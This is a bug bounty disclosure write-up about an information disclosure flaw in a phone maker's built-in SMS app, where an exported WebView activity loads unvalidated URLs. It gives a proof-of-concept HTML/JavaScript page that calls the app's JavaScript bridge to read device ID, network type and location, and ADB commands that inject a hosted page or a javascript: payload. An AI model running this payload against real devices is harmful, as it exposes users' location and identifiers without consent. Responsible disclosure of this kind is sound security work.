Posted on by Editorial Team

Information disclosure through javascript bridge in Android

Summary: One of the top most phone company has info Disclosure vulnerability in there inbuilt sms app.

Javascript Bridge/Interface : The JavaScript to Java bridge (a.k.a. JavascriptInterface) is a WebView feature to programmatically install a Java object into the web page to be accessible from JavaScript.

Description: Inbuilt app has exported “redacted.WebMessageRoutingActivity” to sync sms to cloud using webview,

As this activity was not validated uri pass to its intent variable Url, in result any external malicious app was able pass malicious schemes like javascript, file to open it in webview, this webview was binded with app through some Js-bridges so attacker was able execute javascript to access those Js-bridge’s functions.

Steps to reproduce:

  • Create html file with below snippet and host it
<!DOCTYPE html>
<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>Index</title>
</head>

<body>
	<script>
	// Object.getOwnPropertyNames(window.RedactedJSBridge).forEach(function(v, x) { document.writeln(v); });  
	// Above returns RedactedJSBridge's functions like (disablePullToRefresh,getCloudHashedDeviceId, getNetworkType, requestLocation)
	document.write(RedactedJSBridge.disablePullToRefresh());. //this was to disable Pull to refresh.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.getMiCloudHashedDeviceId()); //this was to retrieve Device ID.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.getNetworkType());. //this was to retrieve Network type like mobile or wifi.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.requestLocation(true));
	document.write("\n\n\n");
	document.write(RedactedJSBridge.getLocation());
	//this was to retrieve location info.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.setBottomBarVisible(true));
	document.write("\n\n\n");
	</script>
</body>

</html>
  • Now as we know , there are two way to reproduce this issue one is through ADB and second is third party app.
  • Using ADB :

adb shell am start -n com.redacted.page/com.redacted.page.activity.WebMessageRoutingActivity -e url “https://servicenger.com/hostedabovefile.html

OR

adb shell am start -n com.redacted.page/com.redacted.page.activity.WebMessageRoutingActivity -e url “javascript://%0Adocument.write(RedactedJSBridge.getLocation());”

Result : From above reproduction we were able to retrieve sensitive information like location, device id etc

Timeline:

  • 11/04/2019 : Reported on Hackerone’s private program.
  • 16/04/2019 : Triaged
  • 22/04/2019 : Rewarded bounty
  • 21/05/2019 : Fixed in OS update.

Thanks )